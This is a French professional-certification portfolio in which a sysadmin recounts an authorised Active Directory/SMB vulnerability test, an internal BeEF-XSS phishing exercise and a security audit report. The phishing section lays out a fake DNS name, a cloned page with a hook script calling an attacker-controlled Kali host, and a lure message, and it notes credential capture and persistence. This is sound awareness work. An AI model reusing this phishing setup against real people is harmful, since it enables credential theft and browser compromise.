Bloc d'activités : Audit de sécurité

Tester et éprouver le réseau et/ou le système d'informations afin de déterminer ses vulnérabilités

Entreprise : Agence Française de la Biodiversité (OFB)

Client : Office Français de la Chasse et de la Faune Sauvage

Projet : Préfiguration fusion ONCFS / AFB

Dates/Durée : 20/09/2019 / 5 jours

Réalisation : Test d'évaluation de la sécurité de l'infrastructure AFB

Source documentaire :

La réalisation majeure

Définition du projet ou de la réalisation

Lors de la fusion des deux établissements il a été nécessaire de faire un état des lieux concernant le niveau de sécurisation du système d'information des deux établissements.

Cette réalisation s'inscrit dans le chantier « sécurité », où j'ai du réaliser un test de vulnérabilité de la brique système Active Directory et des accès aux systèmes de fichiers de l'AFB via le protocole SMB.

Objectifs, contexte, enjeu, risques, opportunités

L'objectif vu donc de tester et d'éprouver l'Active Directory et ainsi que les accès aux systèmes de fichiers NTFS (via le protocole SMB) afin de trouver des vulnérabilités.

Le contexte fût particulier car prenant place dans une ambiance de fusion d'établissement publique, donc avec une tension palpable : il a dont fallu être bienveillant et souple avec certains acteurs du projet.

L'enjeu fut de déceler rapidement les failles de sécurité importantes sur un parc de quelques centaines de serveurs Microsoft Windows et GNU/Linux.

Les contraintes sur ce genre de test sont :

  • d'être le plus transparent donc le moins pertubant possible pour l'exploitation quotidienne du SI lors du test,

  • de respecter une certaine confidentialité quand aux resultats des tests, lesquels ne seront par conséquent pas publiés dans ce document de VAE.

Étapes

Dans un premier temps j'ai du, en tant qu'administrateur système de l'ONCFS, convenir d'une date en accord avec le responsable du pôle infrastructure de l'AFB pour bloquer une journée où nous réaliserions les tests.

Les tests devaient être réalisés à deux car les codes d'accès aux SI n'étaient, au mois de septembre 2019 (pour une fusion en janvier 2020 ... ), pas encore partagés et mutualisés.

J'ai donc eu à préparer et définir le périmètre de notre intervention car vouloir effectuer des tests de vulnérabilité, sur un parc de plus de 1500 stations de travail, plus de 320 serveurs et avec pas moins de 40 sites physiques, eu été illusoire en moins de 8 heures.

La préparation de cette journée, en comptant les réunions, tâches de communication et collectes d'information, m'aura pris 5 jours ETP.

Voici donc les tests qui ont été mené durant la journée de test :

  • récolte d'information de l'Active Directory via l'outil BloodHound pour une analyse approfondie des données ultérieurement,

  • navigations ciblées sur les partages SMB remontés par l'outil précédent sans droits élevés (en mode invité puis simple utilisateur),

  • exploration des ressources de types DFS,

  • contrôles ciblés des ACL positionnées sur les systèmes de fichiers NTFS,

  • énumération des outils de sauvegarde du SI.

Note : Nous nous sommes concentrés sur la recherche de dossiers dits « sensibles » type :

  • ressources humaines,

  • paie,

  • dossiers médicaux,

  • juridique etc ...

Mes actions

J'ai réalisé personnellement toutes les étapes mentionnées ci-dessus en binôme avec mon futur chef de service adjoint : Fabrice MORIZUR.

Acteurs et interactions au sein du projet

Ce test de vulnérabilité s'inscrivant dans un contexte de préfiguration à une fusion d'établissement j'ai du soliciter les personnels des services infrastructure des deux établissements afin d'esquisser une ébauche de la cartographie du SI dans le but de mener efficacement ces tests.

Ainsi j'ai demandé de la documentation à :

  • Trung-hien PHAM (Ex. ONCFS, mon futur chef de service),

  • Cédric SERRA (Ex. ONCFS, Administrateur système),

  • Fabrice MORIZUR (Ex. AFB, mon futur chef de service adjoint).

Résultats (pour moi, pour l'entreprise)

Les résultats furent ceux escomptés. En effet cette réalisation nous a permis de remplir les objectifs fixés en début de projet.

Par conséquent nous avons pu identifier des vulnérabilités majeures du SI AFB en terme d'Active Directory (annuaire Ldap Microsoft) et du système de partage de fichiers.

Lendemains du projet

Dans en premier temps cette journée de test des vulnérabilités nous a permis d'évaluer grossièrement le niveau de sécurisation des deux infrastructures qui allaient fusionner en janvier 2020 (car nous n'avons pas effectué que ce type de test bien entendu ... sécurisation des locaux, procédures, stratégie de sécurité etc etc ).

Cette évalution nous a permis de choisir les meilleurs éléments, au niveau sécurité du SI, dans chacun des deux établissements.

Mon regard critique sur le projet ou la réalisation

Si j'avais eu plus de temps devant moi j'aurais probablement intégré beaucoup plus d'éléments dans mon périmètre de test.

La compétence : autocritique et évolution

Mon niveau de maîtrise de la compétence

J'ai un niveau confirmé dans cette compétence.

Place, importance, priorité de cette compétence dans mon profil d'Expert en Ingénierie ou dans mon métier actuel

Comme je travaille beaucoup sur des projets d'intégration de solution de sécurisation du SI (BeyondTrust, SSO OKTA, HAProxy, BASTION SSH etc) je continue d'exploiter et améliorer cette compétence visant à tester et éprouver les vulnérabilités d'un SI complexe.

Mon évolution

Je m'intéresse de plus en plus aux technologies inhérente au cloud hybride à base de conteneur de ce fait les tests de vulnérabilité sur des infrastructures de type Kubernetes sont au centre de mes intérêts actuels.

Place de la compétence dans mon projet personnel

Cette compétence est omniprésente dans mon projet personnel, car le volume des demandes en terme de sécurisation du SI ne baissent pas.

Niveau que je souhaite atteindre dans cette compétence à moyen terme

Bien qu'étant d'un niveau confirmé dans cette compétence je découvre toujours des nouvelles technologies qui me permettent d'augmenter mon niveau.

Formation ou autoformation en cours ou à venir, sur cette compétence

Je suis en veille technologique constante et active sur ce sujet.

Réaliser des tests d'intrusion dans un réseau et/ou systèmes d'informations

Entreprise : OFB

Client : idem

Projet : POC solution de phishing

Dates/Durée : novembre 2021/ 2 journées

Réalisation : Mise en œuvre d'une plate-forme de phishing BeeF-XSS

Source documentaire :

https://beefproject.com/

La réalisation majeure

Définition du projet ou de la réalisation

J'ai du mettre en place une plate-forme de « Phising » , dans en premier temps, pour sensibiliser les équipes de la DSI et ce en mode mixte « BLack Box » au début puis « White Box » à la fin.

Objectifs, contexte, enjeu, risques, opportunités

L'objectif de cette réalisation fut double :

  • sensibiliser nos administrateurs système et réseau à l'OFB,

  • éprouver et évaluer sommairement notre plateforme de detection d'intrusion et d'attaque du SI : DarkTrace,

  • démontrer, si cela eu été encore nécessaire, la vulnérabilité des technologies actuelles face à la malveillance des « BlackHat ».

Le contexte de ce projet s'inscrit dans :

  • la réalisation d'un POC, avant-achat, d'une plateforme de detection d'intrusion et d'attaque (DarkTrace),

  • une augmentation significative de campagnes de « Phising » diverses (pas que mail) visant les systèmes d'information de l'état Français.

Note : cette campagne de « Phising » interne a été menée en « WhiteHat » via l'outil BeeF-XSS ...

Étapes

Pour mettre en place cette mini-campagne interne ( « ciblée » sur le service infrastructure) j'ai du suivre les étapes suivantes :

  • se documenter sur le frameWork BeeF-XSS,

  • mettre en place un enregistrement DNS de type A/CNAME factice  et complétement plausible : « supervision.ofb.fr » (attendre sa propagation interne),

  • installer un serveur HTTP/S (type nginx, apache, lighthttp,iis) à l'adresse pointée par l'étape précédente (Record DNS) et placer dessus une page web simple, clone de « google.fr » (par exemple) contenant le code d'hameçonnage consistant en un simple appel de « javascript »  :

<script src="https://<IP_KaliLinux>:3000/hook.js"></script>

Note : Ce code peut aussi être injecté sur un site réel existant (port TCP et nom du script modifié) , rendant ainsi encore plus plausible le Phising.

  • se connecter sur l'interface de gestion de BeeF-XSS à l'adresse suivante :

https://<IP_KaliLinux>:3000/ui/panel
  • enfin envoyer le lien Web suivant : « https://supervision.ofb.fr » sans explication ou en l'accompagant d'un texte du type :

    «  Pouvez-vous, svp, tester ce nouveau site vachement sympa et utile, merci de votre coopération  »

  • j'ai du patienter (pas très longtemps ;-)) en scrutant la console « BeeF-XSS », et très rapidement les navigateurs des curieux/victimes se sont connectés sur la plate-forme BeeF-XSS :

  • j'ai finalisé l'hameçonnage en lançant quelques une des attaques présentes dans le framewok,

  • J'ai ainsi pu récupérer des mots de passe et identifiants utilisés par la victime.

    Ces tests, une fois le poste hameçonné, ont été réalisé en binôme avec la victime, je n'étais pas en mode Black box.

Important : Il faut bien entendu imaginer cette même console avec une quantité énorme de machines hameçonnées, d'autant plus, qu'une fois le poste compromis vous pouvez rendre persistante la compromission et ainsi piloter le poste de la victime.

BeeF-XSS peut être couplé au FrameWork « MetaSploit » donnant ansi un arsenal d'attaque redoutable, ensuite la constitution d'un « BotNet » devient ... envisageable.

Mes actions

J'ai réalisé personnellement toutes les étapes mentionnées ci-dessus.

Acteurs et interactions au sein du projet

Durant la phase de mise en place de la solution de Phising (hameçonnage) je fut le seul et unique intervenant.

Par la suite j'ai pu compter sur la coopération des personnes suivantes pour lancer les attaques de récupération d'informations pouvant être « sensibles » :

  • Frédéric Dumont (Administrateur système et réseau OFB),

  • Eric Dumas (Administrateur système et réseau OFB),

  • équipe infrastructure (OFB).

Résultats (pour moi, pour l'entreprise)

Les résultats furent ceux escomptés. En effet cette réalisation nous a permis de remplir les objectifs fixés en début de projet.

Cependant le POC concernant DarkTrace ne fut pas concluant à cette égard, car ce dernier n'a pas détécté la campagne d'hameçonage, pourtant très peu affinée en terme de paramètrage.

Lendemains du projet

Une fois cette campagne de test d'intrusion réussie, l'équipe infrastructure a pris réellement conscience :

  • du potentiel de ce genre d'outillage,

  • que le simple fait d'arriver sur une page HTML, même sécurisée, ne mettait pas à l'abri d'une compromission pouvant savérée désastreuse pour le SI.

  • Les administrateurs système et réseau pouvant être amenés à ouvrir des pages Web sur des serveurs stratégiques ...

Nous avons aussi reporté ce fait à notre prestaire en charge de réaliser le paramètrage de l'outil DarkTrace (encore en POC).

Cela a, entre autre, déclanché la mise en place de sondes réseau supplémenaires et la modification du paramètrage de l'outil en place.

Mon regard critique sur le projet ou la réalisation

Ma marge de progression dans ce domaine est très grande ...

La compétence : autocritique et évolution

Mon niveau de maîtrise de la compétence

Bien que disposant de solide connaissance en séurité informatique , de part mon CV, je pense avoir un niveau correct dans la compétence.

Toutefois en matière de sécurité informatique j'ai appris, et contenu de verifier chaque jour, qu'on se devait de savoir rester humble.

Place, importance, priorité de cette compétence dans mon profil d'Expert en Ingénierie ou dans mon métier actuel

Elle me sert énormement dans la mise en place des solutions que je déploie pour le compte de mon employeur actuel, l'OFB.

Mon évolution

Je souhaiterai pouvoir réaliser des pentesting en étant encadré par des personnels expérimentés dans le domaine.

Place de la compétence dans mon projet personnel

Je continue de développer cette compétence dans mon projet personnel.

Niveau que je souhaite atteindre dans cette compétence à moyen terme

Bien qu'ayant un niveau intéresant (j'ai réussi un entretien d'embauche en mars 2013 à la Business Unit ESEC de Sogeti France) dans cette compétence je découvre toujours des nouvelles technologies qui me permettent d'augmenter mon niveau dans cette compétence.

Formation ou autoformation en cours ou à venir, sur cette compétence

Bien que l'amélioration de compétence soit chronophage, je pratique une veille technologique constante et active, je participe à des forums dédiés à ce domaine.

Synthétiser les conclusions d'un audit dans un rapport écrit

Entreprise : Association iLinux

Client : idem

Projet : Sécurisation hébergeur iLinux v2

Dates/Durée : / 1 semaine

Réalisation : Rédaction d'un rapport d'audit de sécurité

Source documentaire :

La réalisation majeure

Définition du projet

Lors du passage à l'architecture en 2 version (maintenant 3) de mon hebergeur associatif iLinux j'ai du auditer la sécurité de la première version au niveau de l'architecture système et réseau.

J'ai donc du rédiger un rapport d'audit de sécurité de notre infrastructure système et réseau synthétisant les améliorations à apporter afin de les incorporer dans la future infrastructure sécurisée de l'hébergeur iLinux.

Objectifs, contexte, enjeu, risques, opportunités

L’objet de cet audit fut d’auditer la plate-forme d’hébergement de l’association iLinux, plus précisément la sécurité informatique de l’infrastructure système et réseau.

Ce dernier s'inscrit dans le cadre d'une migration d'un lien VDSL (FDN) vers un accès fibre optique 10Gb (Grand publique + FDN) et d'un double changement de local informatique (@home location puis @Espace pro. : Vichy 03200, Atrium).

Les objectifs de la consultation sont déclinés comme suit :

  • Évaluer le niveau de sécurité de l’infrastructure réseaux et système,

  • Proposer les recommandations d’améliorations nécessaires,

  • Définir les architectures cibles qui seront en mesure de :

    • Mettre à niveau l’existant selon les nouveaux besoins et les règles de l’art,

    • Assurer et sécuriser les échanges à l’intérieur des réseaux LAN et au niveau du réseau WAN (VPN) proposé par notre fournisseur réseau iLLyse (FDN).

  • Disposer d’une feuille de route pour la mise en œuvre des architectures cibles et des recommandations pour des projets d’optimisation de l’existant.

Cette consultation présente aussi l'opportunité de prodiguer de précieux conseils aux administrateurs système et réseau de l'association, le tout dans la définition de la politique de sécurité établie par l'association iLinux.

Étapes

Pour réaliser cet audit de sécurité j'ai procéder via les étapes suivantes :

  • définir le périmètre d'intervention,

  • exposer la démarche globale,

  • audit de l'infrastructure réseau et système :se preporter à l'audit complet pour les détails de cette étape : Annexe : Rapport d'audit de sécurité iLinux ,

    Important : toutes les parties de l'annexe ne sont pas totalement documentées par souci de sécurité ou réalisées (manque de temps, moyens voir compétences).

Résultat de l'étude de l'existant : cartographie réseau

  • audit de sécurité :

    • méthodologie et outils

    • tests d'intrusion,

    • audit de vulnérabilités,

    • audit de configuration,

    • obligation de l'auditeur.

  • audit des matèriels et logiciels,

  • fourniture des livrables.

Mes actions

J'ai réalisé personnellement toutes les étapes mentionnées ci-dessus.

Acteurs et interactions au sein du projet

Étant le président de l'association mais aussi le seul technicien ayant les compétences requises pour mener à bien ce type de projet il n‘y a pas eu d'autre acteur ni d'interaction avec les autres adhérents.

Résultats (pour moi, pour l'entreprise)

Les résultats furent ceux escomptés. En effet cette réalisation m'a permis de remplir les objectifs fixés en début de projet.

Lendemains du projet

Actuellement iLinux exploite toujours cette infrastructure système et réseau mais en version 3 et, à ce jour, aucun sinistre n'a été constaté.

Suite à cet audit sécurité d'iLinux j'ai décidé de revoir complétement l'infrastructure système et réseau (passage de V2 à V3 sur 6 mois suite à l'audit de ce projet) en :

  • simplifiant certaines briques :

    • abandon du système de fichier distribué Ceph au profit de ZFS local ,

    • proxmox en mode hyperconvergé,

    • simplification de l'architecture DNS,

    • etc...

  • rendant plus accéssible la gestion de ce SI résolument orienté « hébergeur Internet »,

  • en augmentant son niveau de sécurité, en isolant les réseaux via la technologie des VLAN (norme 802.1q) ainsi qu'en isolant complétement les zones d'administration de celles des utilisateurs finaux,

  • en externalisant sur un deuxième site distant les sauvegardes et en les rendant beaucoup plus simples et souples via l'exploitation complète des Snapshot ZFS,

  • en augmentant le niveau de haute disponibilité et de perfomance du cluster Proxmox,

Ci-dessous l'évolution de notre architecture système et réseau :

Version 2 de notre infrastructure :

  • Cluster Proxmox 3 noeuds hyperconvergé,

  • avec le système de fichiers distribué Ceph,

  • la mise en oeuvre de VLAN (zone de sécurité layer 2 OSI),

  • déploiement ISPconfig (control panel webhosting),

  • POC vps IPv6.

Mon regard critique sur le projet ou la réalisation

De bons choix et une bonne mise en place des briques du SI de cette infrastructure suite à cet audit de sécurité me permette d'affirmer que ce projet est une réussite.

Notre association vient même d'engranger de nouveaux d'adhérents, les anciens étant pleinement satisfait de la qualité de service notre plate-forme ainsi que sa haute disponibilité.

Note : Notre association a récement (décembre 2021) fusionnée avec un autre acteur majeur de la région auvergne dans le domaine des logiciels libre : LIBRaiSOL.

La compétence : autocritique et évolution

Mon niveau de maîtrise de la compétence

J'ai un niveau confirmé dans la compétence d'audit de sécurité du SI.

Place, importance, priorité de cette compétence dans mon profil d'Expert en Ingénierie ou dans mon métier actuel

Je souhaite valoriser cette expèrience pour aller plus loin.

Nénamoins cela reste assez compliqué dans un environnement ou l'on doit assurer le support de niveau 3 qui plus est dans un contexte de reduction constant des effectifs de l'état.

Mon évolution

Concernant les audits de sécurité je ne suis malheureusement pas sur un poste avec lequel je peux évoluer rapidement dans cette compétence.

Je tente toutefois de prendre le maximum de projet concernant la sécurité informatique de notre SI de l'OFB (Ex. HAproxy, BeyondTrust, SSO/IDM OKTA).

Place de la compétence dans mon projet personnel

Le volume des demandes en terme de sécurisation du SI ne baissent pas, cependant ce genre d'audit est plutôt confié à des prestataires/sociétés extérieurs spécialisés dans ce domaine.

Il m'est donc difficle de m'entrainer sur cette compétence.

Niveau que je souhaite atteindre dans cette compétence à moyen terme

Bien qu'ayant un niveau intéressant dans cette compétence je découvre toujours des nouvelles technologies qui me permette d'augmenter mon niveau dans cette compétence.

Formation ou autoformation en cours ou à venir, sur cette compétence

Je suis toujours en veille technologique concernant cette compétence, notamment en consultant des forums, lisant des articles sur les sites spécialisés et en participant à des Webinars (multiples sessions avec les acteurs de la sécurité informatique suivants :WatchGuard et Kaspersky).